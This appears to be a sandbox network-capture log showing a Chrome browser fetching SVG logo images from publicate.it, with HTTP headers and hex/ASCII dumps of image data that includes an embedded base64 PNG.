                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 4d 4b 75 4a 43 44 4e 33 38 49 2b 62 35 64 2f 45 59 79 76 34 77 38 31 32 47 30 7a 54 70 72 72 52 50 4a 41 66 43 63 37 46 30 61 47 71 59 53 4e 43 69 50 6a 34 31 66 57 76 6f 45 35 79 6c 41 70 59 48 4d 41 79 67 2b 6c 55 6e 77 4f 44 44 63 72 4f 39 41 77 73 37 72 30 70 30 35 6b 62 43 65 75 58 6a 49 4b 79 52 7a 7a 71 59 33 78 5a 70 45 72 65 56 72 42 31 4e 59 72 78 57 78 4f 7a 35 49 65 71 76 55 74 66 37 6f 41 62 4b 44 47 6f 4e 34 31 65 7a 33 6e 42 77 2f 79 46 37 4c 59 53 58 69 53 6b 67 57 64 73 36 77 74 72 63 49 2b 45 65 54 30 56 6a 52 69 39 71 35 58 78 4e 6f 31 57 4e 65 42 6d 59 4e 74 34 49 79 78 6a 2b 5a 66 44 64 41 44 7a 35 39 56 6c 50 33 79 55 57 66 69 4f 63 31 4f 67 47 45 76 53 4d 2b 4c 66 35 50 4b 49 4c 72 68 42 7a 53 66 47 57 6e 54 59 6d 68 54 56 31 69 65
                                                                                                                                                                                                        Data Ascii: MKuJCDN38I+b5d/EYyv4w812G0zTprrRPJAfCc7F0aGqYSNCiPj41fWvoE5ylApYHMAyg+lUnwODDcrO9Aws7r0p05kbCeuXjIKyRzzqY3xZpEreVrB1NYrxWxOz5IeqvUtf7oAbKDGoN41ez3nBw/yF7LYSXiSkgWds6wtrcI+EeT0VjRi9q5XxNo1WNeBmYNt4Iyxj+ZfDdADz59VlP3yUWfiOc1OgGEvSM+Lf5PKILrhBzSfGWnTYmhTV1ie
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 36 48 6f 42 67 7a 6f 4e 72 45 63 53 70 79 37 33 31 33 46 71 6c 4b 36 4e 69 5a 37 67 71 4e 42 6e 6e 4a 61 44 6b 64 32 58 5a 77 4c 4c 32 6f 52 6a 74 79 49 56 55 4c 73 72 5a 75 4d 54 52 69 45 35 38 39 4d 49 2f 37 59 38 52 73 2b 37 55 6b 4e 5a 4a 54 70 62 34 36 5a 50 5a 65 33 62 34 63 59 4f 6f 58 4d 76 63 35 44 55 4f 6f 72 46 5a 6e 6e 49 37 6b 75 76 31 48 49 46 32 6e 64 55 66 4c 4c 4b 66 73 42 66 4b 36 6a 79 6f 77 76 65 72 56 2b 75 73 54 58 4b 4c 6f 45 76 4b 73 6f 65 45 70 56 4e 64 37 6a 2f 58 45 6c 37 50 5a 65 69 61 43 7a 6d 48 73 59 4a 6e 61 4d 51 78 31 77 6f 63 52 58 49 32 6a 43 35 7a 47 49 35 39 78 50 78 71 73 4b 78 55 61 58 52 30 73 6d 49 6e 78 78 47 7a 41 71 7a 36 31 78 72 65 64 54 6c 45 2b 51 72 78 7a 63 4f 50 6f 77 4b 56 6b 71 42 38 54 77 42 30 47 53
                                                                                                                                                                                                        Data Ascii: 6HoBgzoNrEcSpy7313FqlK6NiZ7gqNBnnJaDkd2XZwLL2oRjtyIVULsrZuMTRiE589MI/7Y8Rs+7UkNZJTpb46ZPZe3b4cYOoXMvc5DUOorFZnnI7kuv1HIF2ndUfLLKfsBfK6jyowverV+usTXKLoEvKsoeEpVNd7j/XEl7PZeiaCzmHsYJnaMQx1wocRXI2jC5zGI59xPxqsKxUaXR0smInxxGzAqz61xredTlE+QrxzcOPowKVkqB8TwB0GS


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        121192.168.2.549910104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC704OUTGET /images/macOS_client.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC755INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:26 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 609249
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "94be1-620aa1d1dc5e9"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ICvEGnJ%2FMrQCFeZon5XsKm%2BoGGUaHqQ0D3OyHplEThPRyp1YQbhWYH6452a5yjlubLNH8KEwlEFapM2DQ%2Fm2zfTFzEOawGWNGehPLJqatHpvd3QSCYFEHLk%2F0qZxFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615d7aa777cf3-EWR
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC614INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 30 37 33 31 37 30 37 2c 30 20 4c 31 30 37
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>5</title> <defs> <path d="M10.0731707,0 L107
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 65 72 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 20 72 61 64 69 75 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74
                                                                                                                                                                                                        Data Ascii: er-2"> <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur st
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 38 22 20 78 6c 69 6e 6b 3a 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 6f 41 41 41 41 4b 41 43 41 59 41 41 41 41 4d 7a 63 6b 6a 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 45 52 6c 57 45 6c 6d 54 55 30 41 4b 67 41 41 41 41 67 41 41 59 64 70 41 41 51 41 41 41 41 42 41 41 41 41 47 67 41 41 41 41 41 41 41 36 41 42 41 41 4d 41 41 41 41 42 41 41 45 41 41 4b 41 43 41 41 51 41 41 41 41 42 41 41 41 43 67 4b 41 44 41 41 51 41 41 41 41 42 41 41 41 43 67 41 41 41 41 41 41 41 6b 73 37 2f 41 41 42 41 41 45 6c 45 51 56 52 34 41 65 78 39 43 59 41 64 52 62 58 32 7a 5a 32 62 6d 35 6c 68 4d 70 6b 6b 6b 34 55 77 68 44 45 45 43 46 73 49 49 62
                                                                                                                                                                                                        Data Ascii: 8" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAoAAAAKACAYAAAAMzckjAAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAACgKADAAQAAAABAAACgAAAAAAAks7/AABAAElEQVR4Aex9CYAdRbX2zZ2bm5lhMpkkk4UwhDEECFsIIb
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 58 6c 46 52 4d 65 4b 4c 58 2f 7a 69 49 59 41 5a 2b 4d 55 32 53 61 5a 79 4e 6d 58 4b 6c 68 32 61 39 73 6b 44 62 39 49 44 71 55 4f 39 53 63 65 6c 5a 73 6b 44 79 51 50 4a 41 38 6b 44 2f 7a 59 50 6c 4c 74 32 45 65 74 72 79 78 6f 73 2f 69 7a 65 55 7a 6e 57 4b 31 6f 79 51 74 37 52 32 70 72 76 5a 4b 43 48 6a 51 2f 61 36 32 46 37 35 67 45 62 4e 43 6a 58 30 4e 42 77 7a 48 6e 6e 6e 56 63 50 6d 44 4e 2f 61 67 38 79 42 48 73 78 4a 70 78 59 53 73 6b 44 61 2b 32 42 31 4a 48 57 32 6f 56 4a 51 50 4a 41 38 6b 44 79 51 50 4c 41 57 2b 53 42 62 45 42 45 74 54 45 6d 57 72 64 6a 71 2f 66 59 59 34 2f 61 71 36 2b 2b 65 76 78 46 46 31 31 55 47 2f 46 6d 72 33 31 71 31 39 74 68 5a 4e 76 45 76 48 48 37 50 4e 49 49 50 4f 39 58 74 4e 6b 2f 48 77 67 71 49 49 77 62 44 61 32 70 32 66 76
                                                                                                                                                                                                        Data Ascii: XlFRMeKLX/ziIYAZ+MU2SaZyNmXKlh2a9skDb9IDqUO9ScelZskDyQPJA8kD/zYPlLt2Eetryxos/izeUznWK1oyQt7R2prvZKCHjQ/a62F75gEbNCjX0NBwzHnnnVcPmDN/ag8yBHsxJpxYSskDa+2B1JHW2oVJQPJA8kDyQPLAW+SBbEBEtTEmWrdjq/fYY4/aq6++evxFF11UG/Fmr31q19thZNvEvHH7PNIIPO9XtNk/HwgqIIwbDa2p2fv
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 34 4f 79 77 6f 67 52 49 79 70 2f 2f 38 41 44 73 79 5a 73 75 65 57 5a 59 47 65 64 70 54 6a 49 49 30 41 62 68 51 56 37 49 2f 74 38 38 49 67 33 79 62 53 2b 75 48 54 70 30 76 75 66 65 75 71 70 33 7a 37 30 30 45 4e 50 72 6c 69 78 59 75 57 71 56 61 74 61 38 45 57 52 74 70 45 6a 52 78 61 2b 2f 76 57 76 4c 38 52 78 63 39 46 49 4f 62 75 46 6d 51 31 70 6c 7a 78 51 7a 67 4f 68 6b 35 61 72 54 46 6a 79 51 50 4a 41 38 6b 44 79 77 49 44 31 67 41 49 64 4f 55 44 6c 50 4a 35 7a 47 7a 46 6a 78 6f 79 4a 32 30 32 61 74 4f 66 67 49 55 50 47 46 44 43 37 68 6d 66 73 47 76 48 73 32 37 51 4b 76 41 49 46 41 55 37 54 4b 79 2b 2f 2f 46 45 30 2f 44 34 32 42 53 4e 71 72 7a 4c 6c 45 6f 76 4c 78 4a 6a 45 36 30 72 64 39 36 79 33 37 64 42 44 44 36 30 5a 6a 4e 75 37 4e 70 76 42 49 43 38 37
                                                                                                                                                                                                        Data Ascii: 4OywogRIyp//8ADsyZsueWZYGedpTjII0AbhQV7I/t88Ig3ybS+uHTp0vufeuqp3z700ENPrlixYuWqVata8EWRtpEjRxa+/vWvL8Rxc9FIObuFmQ1plzxQzgOhk5arTFjyQPJA8kDywID1gAIdOUDlPJ5zGzFjxoyJ202atOfgIUPGFDC7hmfsGvHs27QKvAIFAU7TKy+//FE0/D42BSNqrzLlEovLxJjE60rd96y37dBDD60ZjNu7NpvBIC87
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 77 7a 2b 6e 4d 58 58 4c 44 37 78 7a 37 32 73 51 75 77 34 4f 4d 45 7a 49 51 4f 74 57 4f 50 66 43 44 39 50 64 71 53 38 56 56 50 66 4e 37 53 73 6c 6c 54 63 2f 4f 4c 57 43 44 79 6d 37 2f 2f 2f 65 2f 4e 45 51 50 64 45 50 74 57 56 58 4b 50 79 69 6c 50 48 69 67 39 48 35 49 2f 6b 67 65 53 42 35 49 48 6b 67 66 2b 62 52 35 51 73 42 4d 62 49 4d 77 43 45 46 51 77 4c 79 4a 59 4b 65 49 62 73 71 4f 6e 37 37 62 62 31 4e 71 36 75 75 31 78 64 57 39 35 38 73 6b 6e 76 33 33 51 51 51 65 39 69 48 6f 74 42 4b 43 63 6d 43 35 58 4a 71 59 6b 58 53 79 4c 5a 70 36 6c 69 30 73 57 4c 2f 34 68 58 6c 6d 79 6a 7a 56 6b 34 4a 4e 4e 77 49 68 32 64 6e 53 30 59 44 58 77 74 56 74 75 74 64 55 6c 4b 48 4c 46 4b 6a 63 6d 32 63 56 63 74 46 56 45 75 36 78 65 32 57 49 7a 67 41 6a 45 78 6e 37 31 6d
                                                                                                                                                                                                        Data Ascii: wz+nMXXLD7xz72sQuw4OMEzIQOtWOPfCD9PdqS8VVPfN7SsllTc/OLWCDym7///e/NEQPdEPtWVXKPyilPHig9H5I/kgeSB5IHkgf+bR5QsBMbIMwCEFQwLyJYKeIbsqOn77bb1Nq6uu1xdW958sknv33QQQe9iHotBKCcmC5XJqYkXSyLZp6li0sWL/4hXlmyjzVk4JNNwIh2dnS0YDXwtVtutdUlKHLFKjcm2cVctFVEu6xe2WIzgAjExn71m
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 54 55 33 33 43 6b 77 65 53 42 35 49 48 4e 6e 59 50 78 42 66 4f 37 4c 47 71 72 6c 79 65 35 57 56 5a 66 4f 58 71 79 6d 48 6b 56 38 72 53 56 6c 36 39 65 6e 56 2b 55 47 64 6e 33 67 49 44 50 37 4e 6c 4e 46 70 5a 45 4f 4a 62 56 78 51 4b 34 30 34 36 36 61 54 33 59 69 5a 51 4b 30 50 74 57 54 6c 55 78 7a 62 46 74 50 51 79 4c 36 64 62 76 43 47 48 2f 48 48 31 39 66 55 48 49 50 44 69 4c 4a 6b 46 53 52 62 77 4d 41 6a 43 5a 6f 45 4d 63 73 4d 67 4e 4c 59 5a 41 56 73 39 5a 6a 4d 76 2f 75 6c 50 66 33 72 2b 70 5a 64 65 4f 6d 6e 4d 6d 44 47 63 76 61 4b 4e 32 6f 49 65 62 77 2f 4c 72 43 73 79 61 4a 77 39 65 2f 59 55 62 46 64 73 74 63 30 32 5a 31 4b 2f 66 45 43 39 6c 71 53 58 5a 57 77 6c 74 76 53 43 57 58 76 66 31 6d 53 53 4c 75 64 6e 42 70 73 52 33 39 72 71 7a 64 70 48 32 66
                                                                                                                                                                                                        Data Ascii: TU33CkweSB5IHNnYPxBfO7LGqrlye5WVZfOXqymHkV8rSVl69enV+UGdn3gIDP7NlNFpZEOJbVxQK40466aT3YiZQK0PtWTlUxzbFtPQyL6dbvCGH/HH19fUHIPDiLJkFSRbwMAjCZoEMcsMgNLYZAVs9ZjMv/ulPf3r+pZdeOmnMmDGcvaKN2oIebw/LrCsyaJw9e/YUbFdstc02Z1K/fEC9lqSXZWwltvSCWXvf1mSSLudnBpsR39rqzdpH2f
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 7a 42 38 33 33 76 62 6c 4c 56 38 2b 6f 62 68 34 38 64 4c 37 62 37 76 74 4a 37 4f 76 2b 4e 4c 56 6e 50 48 54 62 4b 6c 2b 57 2f 32 2b 63 55 36 70 4c 44 50 31 39 4a 75 37 32 72 51 66 73 42 37 51 79 54 35 67 48 5a 41 4f 50 48 6b 67 65 65 44 66 36 67 47 4f 51 66 48 57 6d 7a 48 39 35 65 74 4e 42 75 76 69 63 55 38 79 68 65 66 2f 2b 4d 63 2f 64 74 51 4f 48 54 6f 44 72 77 4d 35 75 4b 71 79 63 69 71 43 46 68 64 34 49 62 6a 77 49 59 63 46 4c 6c 74 76 76 66 58 4d 69 52 4d 6e 36 6e 6d 37 57 49 35 6b 4d 59 39 54 72 46 65 34 73 48 4c 74 47 59 41 56 33 76 57 75 64 2b 32 4e 6c 77 33 58 38 4a 61 6e 36 56 65 51 51 77 6e 43 47 41 53 42 5a 73 4a 73 57 65 32 55 6e 58 61 36 34 76 65 2f 2f 2f 31 78 65 4f 61 4f 74 34 35 4e 44 6e 4c 70 4b 4a 65 7a 61 59 79 48 34 4f 2b 69 69 79 36
                                                                                                                                                                                                        Data Ascii: zB833vblLV8+obh48dL7b7vtJ7Ov+NLVnPHTbKl+W/2+cU6pLDP19Ju72rQfsB7QyT5gHZAOPHkgeeDf6gGOQfHWmzH95etNBuvicU8yhef/+Mc/dtQOHToDrwM5uKqyciqCFhd4IbjwIYcFLltvvfXMiRMn6nm7WI5kMY9TrFe4sHLtGYAV3vWud+2Nlw3X8Jan6VeQQwnCGASBZsJsWe2UnXa64ve///1xeOaOt45NDnLpKJezaYyH4O+iiy6
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 64 43 54 42 35 49 48 33 69 6f 50 5a 49 4d 67 6c 66 4f 31 74 62 55 31 57 48 56 62 66 64 52 52 52 34 33 48 34 6f 57 39 68 77 30 64 75 69 4f 43 6a 38 70 38 52 63 55 49 76 45 52 34 49 6d 61 42 6c 76 37 79 6c 37 2b 63 65 66 54 52 52 37 38 49 59 2b 4f 4c 57 6b 7a 72 4f 4d 70 68 30 6b 55 65 30 58 46 4f 32 72 5a 62 62 37 31 31 79 73 45 48 48 2f 77 39 72 4c 77 64 48 38 39 32 68 51 55 47 6c 49 41 67 68 49 4d 6e 37 4f 70 59 76 47 6a 52 4c 52 38 35 38 38 7a 7a 45 5a 78 71 31 61 33 30 5a 33 4f 32 7a 43 62 70 4a 63 37 41 6a 2b 58 43 69 42 45 6a 4b 6e 47 38 4a 30 33 64 65 65 66 4c 57 4d 46 6e 37 32 77 6d 7a 41 49 47 36 50 58 36 2b 32 47 66 74 61 55 4d 43 39 6a 77 79 62 69 57 6c 70 59 46 7a 63 33 4e 38 31 70 62 57 35 66 79 47 54 4f 38 30 43 2f 48 5a 77 77 48 46 34 74 6a
                                                                                                                                                                                                        Data Ascii: dCTB5IH3ioPZIMglfO1tbU1WHVbfdRRR43H4oW9hw0duiOCj8p8RcUIvER4ImaBlv7yl7+cefTRR78IY+OLWkzrOMph0kUe0XFO2rZbb711ysEHH/w9rLwdH892hQUGlIAghIMn7OpYvGjRLR8588zzEZxq1a30Z3O2zCbpJc7Aj+XCiBEjKnG8J03deefLWMFn72wmzAIG6PX6+2GftaUMC9jwybiWlpYFzc3N81pbW5fyGTO80C/HZwwHF4tj
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 74 7a 57 47 6e 42 45 75 31 67 30 47 65 41 49 59 37 32 67 5a 38 72 75 41 75 34 31 51 34 61 31 49 46 62 77 53 2f 43 76 6d 2f 66 63 2b 65 64 64 33 31 35 39 75 79 35 4c 37 33 30 55 74 5a 57 4e 70 4d 64 68 54 50 4f 4f 47 4d 73 6e 6a 6d 63 67 76 66 39 6e 59 31 58 79 2b 77 41 62 55 56 71 6a 4c 53 35 59 4a 4f 74 65 72 43 46 56 51 72 79 6a 4d 37 79 5a 65 77 31 6e 6a 35 32 46 75 43 4b 4a 79 75 50 65 4d 4c 57 32 67 64 63 2f 47 47 76 67 4f 48 58 50 2f 43 35 4e 36 34 43 76 76 66 65 65 2f 2f 6e 38 43 50 66 66 7a 4d 38 72 48 37 44 38 7a 43 37 73 5a 2f 72 2f 46 53 75 76 73 39 63 4e 4d 67 53 6d 75 57 55 6b 67 66 4d 41 78 7a 38 55 6b 6f 65 53 42 37 59 4f 44 30 51 42 7a 34 36 51 6d 48 4b 46 51 41 56 74 39 78 79 79 38 4c 48 50 2f 4b 52 30 54 50 32 32 32 38 79 56 6f 37 57 2f
                                                                                                                                                                                                        Data Ascii: tzWGnBEu1g0GeAIY72gZ8ruAu41Q4a1IFbwS/Cvm/fc+edd3159uy5L730UtZWNpMdhTPOOGMsnjmcgvf9nY1Xy+wAbUVqjLS5YJOterCFVQryjM7yZew1nj52FuCKJyuPeMLW2gdc/GGvgOHXP/C5N64Cvvfee//n8CPffzM8rH7D8zC7sZ/r/FSuvs9cNMgSmuWUkgfMAxz8UkoeSB7YOD0QBz46QmHKFQAVt9xyy8LHP/KR0TP2228yVo7W/


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        122192.168.2.549912104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC706OUTGET /images/hubspot_client.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC757INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:26 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 34485
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "86b5-620aa1d25a590"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MEQldriu0J6g%2FYo3Ocv6CdAg26kSaGgIIOOQz1kYI0TS6izQoDnP41Js%2FnxcaxYjy%2B4a%2FO5t%2BnoSwOgaJYj3ytbDjo2PZu7X2Tzut%2BmJbn53Vi7vqduZiar5K6zTQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615d79bc6436d-EWR
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC612INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 37 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 30 37 33 31 37 30 37 2c 30 20 4c 31 30 37
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>7</title> <defs> <path d="M10.0731707,0 L107
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 6c 74 65 72 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 20 72 61 64 69 75 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20
                                                                                                                                                                                                        Data Ascii: lter-2"> <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur
